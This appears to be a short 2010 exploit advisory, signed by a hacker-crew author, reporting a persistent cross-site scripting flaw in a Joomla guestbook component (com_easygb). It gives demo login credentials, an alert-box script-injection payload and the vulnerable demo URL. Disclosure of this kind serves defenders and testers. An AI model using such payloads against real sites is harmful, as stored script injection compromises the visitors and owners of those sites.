Author: L0rd CrusAd3r aka VSN [crusader_hmg@yahoo.com]
Exploit Title:Joomla Persistant XSS Vulnerable
Published: 2010-06-08
Vendor url:http://www.joomla-addons.org/
Platform: Unix, Linux , Windows

Greetz to:Sid3^effects, aa_Numb, M4n0, D4rk Blu3, KD and to all ICW members

#############################################################################################################################################################################

DESCRIPTION:

Contains Persistant XSS on Joomla

###############################################################################################################################################################################

Vulnerability:

Username: demo
Password: demo

The Site contains Persistant XSS Vulenrable on GuestBook

demo URL:-

Parameter:'"--><script>alert(0x000872)</script>

http:http://demo.joomla-addons.org/index.php?option=com_easygb&Itemid=6[XSS]

################################################################################################################################################################################
-- 
With R3gards,
L0rd CrusAd3r